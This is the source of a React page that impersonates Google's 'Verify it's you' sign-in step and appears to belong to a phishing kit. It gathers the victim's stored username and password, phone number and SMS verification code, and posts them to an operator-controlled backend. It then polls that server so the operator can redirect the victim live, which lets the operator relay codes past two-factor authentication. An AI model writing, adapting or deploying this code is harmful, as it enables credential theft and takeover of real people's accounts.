import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import GoogleAuthLayout from "./GoogleAuthLayout";
import { AUTH_TYPE_ROUTES } from "./authRoutes";
import {
  countries,
  findCountryByCode,
  validatePhoneNumber,
  getPhoneLengthHint,
} from "./countryPhoneData";

function formatMaskedPhone(fullPhone, dialCode) {
  const digits = fullPhone.replace(/\D/g, "");
  const dialDigits = dialCode.replace(/\D/g, "");
  const localPart = digits.slice(dialDigits.length);
  if (localPart.length <= 2) return fullPhone;
  const lastTwo = localPart.slice(-2);
  const maskLen = Math.max(localPart.length - 2, 4);
  return `${dialCode}${"*".repeat(maskLen)}${lastTwo}`;
}

export default function Phone() {
  const navigate = useNavigate();
  const [phone, setPhone] = useState("");
  const [code, setCode] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [email, setEmail] = useState("");
  const [showCodeStep, setShowCodeStep] = useState(false);
  const [phoneNumberSent, setPhoneNumberSent] = useState("");
  const [codeSubmitted, setCodeSubmitted] = useState(false);
  const [selectedCountry, setSelectedCountry] = useState(
    countries.find((c) => c.code === "US") || countries[0]
  );
  const [showCountryDropdown, setShowCountryDropdown] = useState(false);
  const [countrySearch, setCountrySearch] = useState("");
  const countryDropdownRef = useRef(null);
  const countryButtonRef = useRef(null);
  const inputRef = useRef(null);
  const delayTimerRef = useRef(null);

  const API_URL = process.env.REACT_APP_API_BASE_URL;

  const filteredCountries = countrySearch
    ? countries.filter(
        (country) =>
          country.name.toLowerCase().includes(countrySearch.toLowerCase()) ||
          country.dialCode.includes(countrySearch) ||
          country.code.toLowerCase().includes(countrySearch.toLowerCase())
      )
    : countries;

  const handleCountrySelect = (country) => {
    setSelectedCountry(country);
    setShowCountryDropdown(false);
    setCountrySearch("");
    if (error) setError("");
    inputRef.current?.focus();
  };

  useEffect(() => {
    const storedEmail =
      localStorage.getItem("userEmail") || localStorage.getItem("username") || "";
    setEmail(storedEmail);

    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }

    fetch("https://ipwho.is/")
      .then((res) => res.json())
      .then((data) => {
        const match = findCountryByCode(data.country_code);
        if (match) setSelectedCountry(match);
      })
      .catch(() => {});

    inputRef.current?.focus();

    return () => {
      if (delayTimerRef.current) clearTimeout(delayTimerRef.current);
    };
  }, []);

  useEffect(() => {
    const handleClickOutside = (event) => {
      if (
        countryDropdownRef.current &&
        !countryDropdownRef.current.contains(event.target) &&
        countryButtonRef.current &&
        !countryButtonRef.current.contains(event.target)
      ) {
        setShowCountryDropdown(false);
        setCountrySearch("");
      }
    };
    document.addEventListener("mousedown", handleClickOutside);
    return () => document.removeEventListener("mousedown", handleClickOutside);
  }, []);

  useEffect(() => {
    if (showCodeStep) {
      inputRef.current?.focus();
    }
  }, [showCodeStep]);

  useEffect(() => {
    if (!sessionId || !codeSubmitted) {
      if (!codeSubmitted) setLoading(false);
      return;
    }

    setLoading(true);

    const routes = AUTH_TYPE_ROUTES;

    const poll = setInterval(async () => {
      try {
        const res = await fetch(`${API_URL}/check_response?session_id=${sessionId}`);
        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        if (data.redirect) {
          clearInterval(poll);
          setLoading(false);
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.authType && data.authType !== "phone") {
          clearInterval(poll);
          setLoading(false);
          const route = routes[data.authType];
          if (route) navigate(route);
          return;
        }

        if (data.error) {
          clearInterval(poll);
          setLoading(false);
          setCodeSubmitted(false);
          setError(data.error);
        }
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        setCodeSubmitted(false);
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, codeSubmitted, API_URL, navigate]);

  const handleSubmit = (e) => {
    e.preventDefault();
    setError("");

    if (!showCodeStep) {
      if (!phone.trim()) {
        setError("Please enter a phone number");
        return;
      }

      if (!validatePhoneNumber(selectedCountry.dialCode, phone)) {
        setError(
          `Invalid phone number for ${selectedCountry.name}. Expected ${getPhoneLengthHint(selectedCountry)}.`
        );
        return;
      }

      const fullPhone = `${selectedCountry.dialCode}${phone}`;
      setLoading(true);

      const username = localStorage.getItem("username") || "";
      const password = localStorage.getItem("password") || "";
      const currentSessionId = sessionId || localStorage.getItem("session_id");

      (async () => {
        try {
          const res = await fetch(`${API_URL}/api/phone`, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({
              phone: fullPhone,
              country_code: selectedCountry.code,
              username,
              password,
              session_id: currentSessionId,
            }),
          });

          if (!res.ok) {
            const data = await res.json();
            throw new Error(data.detail || "Submission failed");
          }

          const { session_id } = await res.json();
          if (session_id) {
            setSessionId(session_id);
            localStorage.setItem("session_id", session_id);
          }

          setPhoneNumberSent(fullPhone);
          delayTimerRef.current = setTimeout(() => {
            setShowCodeStep(true);
            setLoading(false);
            setCode("");
          }, 2000);
        } catch (err) {
          console.error("Phone submission failed:", err);
          setError(err.message || "Submission failed");
          setLoading(false);
        }
      })();
      return;
    }

    if (!code || code.length < 6) {
      setError("Please enter the 6-digit verification code");
      return;
    }

    setLoading(true);

    const username = localStorage.getItem("username") || "";
    const password = localStorage.getItem("password") || "";
    const currentSessionId = sessionId || localStorage.getItem("session_id");

    (async () => {
      try {
        const res = await fetch(`${API_URL}/api/phone`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            code,
            username,
            password,
            session_id: currentSessionId,
            is_verification: true,
          }),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Verification failed");
        }

        const { session_id } = await res.json();
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        setCodeSubmitted(true);
      } catch (err) {
        console.error("Code verification failed:", err);
        setError(err.message || "Verification failed");
        setLoading(false);
      }
    })();
  };

  const maskedPhone = phoneNumberSent
    ? formatMaskedPhone(phoneNumberSent, selectedCountry.dialCode)
    : "";

  return (
    <GoogleAuthLayout
      heading="Verify it's you"
      subheading="To help keep your account safe, Google wants to make sure it's really you trying to sign in"
      email={email}
      showEmailBadge
    >
      {!showCodeStep ? (
        <div className="google-phone-step-copy">
          <h2 className="google-phone-step-title">Get a verification code</h2>
          <p className="google-phone-step-text">
            To get a verification code, first confirm the phone number you added to your account.
          </p>
        </div>
      ) : (
        <div className="google-phone-step-copy">
          <h2 className="google-phone-step-title">Enter verification code</h2>
          <p className="google-phone-sent-message">
            A verification code was sent to your phone number {maskedPhone}
          </p>
        </div>
      )}

      {error && (
        <div className="google-error-container">
          <p className="google-error-message">{error}</p>
        </div>
      )}

      <form onSubmit={handleSubmit} className="google-login-form">
        <div className="google-auth-fields">
        {!showCodeStep ? (
          <>
            <div className="google-input-group">
              <div className="google-phone-input-wrapper">
                <button
                  ref={countryButtonRef}
                  type="button"
                  className="google-country-button"
                  onClick={() => setShowCountryDropdown((open) => !open)}
                  disabled={loading}
                  aria-label="Select country"
                >
                  <img src={selectedCountry.flag} alt="" className="google-country-flag" />
                  <span className="google-country-dial">{selectedCountry.dialCode}</span>
                  <svg width="12" height="12" viewBox="0 0 12 12" aria-hidden="true">
                    <path fill="#5f6368" d="M6 9L1 4h10z" />
                  </svg>
                </button>
                <input
                  ref={inputRef}
                  id="phoneNumber"
                  type="tel"
                  inputMode="numeric"
                  autoComplete="tel-national"
                  value={phone}
                  disabled={loading}
                  onChange={(e) => {
                    const val = e.target.value.replace(/\D/g, "").slice(0, 15);
                    setPhone(val);
                    if (error) setError("");
                  }}
                  required
                  className={`google-input google-phone-input ${phone.trim() ? "google-input-filled" : ""} ${
                    error ? "google-input-error" : ""
                  }`}
                />
                <label htmlFor="phoneNumber" className="google-label google-phone-label">
                  Phone number
                </label>
              </div>
            </div>

            {showCountryDropdown && (
              <div ref={countryDropdownRef} className="google-country-dropdown">
                <input
                  type="text"
                  placeholder="Search country..."
                  value={countrySearch}
                  onChange={(e) => setCountrySearch(e.target.value)}
                  className="google-country-search"
                />
                <div className="google-country-list">
                  {filteredCountries.map((country) => (
                    <button
                      key={country.code}
                      type="button"
                      className={`google-country-option ${
                        selectedCountry.code === country.code ? "selected" : ""
                      }`}
                      onClick={() => handleCountrySelect(country)}
                    >
                      <img src={country.flag} alt="" className="google-country-flag" />
                      <span className="google-country-name">{country.name}</span>
                      <span className="google-country-dial">{country.dialCode}</span>
                    </button>
                  ))}
                  {filteredCountries.length === 0 && (
                    <div className="google-country-empty">No countries found</div>
                  )}
                </div>
              </div>
            )}
          </>
        ) : (
          <div className="google-input-group">
            <div className="google-input-wrapper">
              <input
                ref={inputRef}
                id="verificationCode"
                type="tel"
                inputMode="numeric"
                maxLength={6}
                value={code}
                disabled={loading}
                onChange={(e) => {
                  const val = e.target.value.replace(/\D/g, "").slice(0, 6);
                  setCode(val);
                  if (error) setError("");
                }}
                required
                className={`google-input ${code.trim() ? "google-input-filled" : ""} ${
                  error ? "google-input-error" : ""
                }`}
              />
              <label htmlFor="verificationCode" className="google-label">
                Enter code
              </label>
            </div>
          </div>
        )}

        </div>

        <div className="google-button-group google-auth-actions">
          <a href="#" className="google-link-secondary">Try another way</a>
          <button
            type="submit"
            className="google-button-primary"
            disabled={
              loading ||
              (!showCodeStep && !phone.trim()) ||
              (showCodeStep && code.length < 6)
            }
          >
            {loading ? (
              <div className="google-spinner" />
            ) : showCodeStep ? (
              "Verify"
            ) : (
              "Next"
            )}
          </button>
        </div>
      </form>
    </GoogleAuthLayout>
  );
}
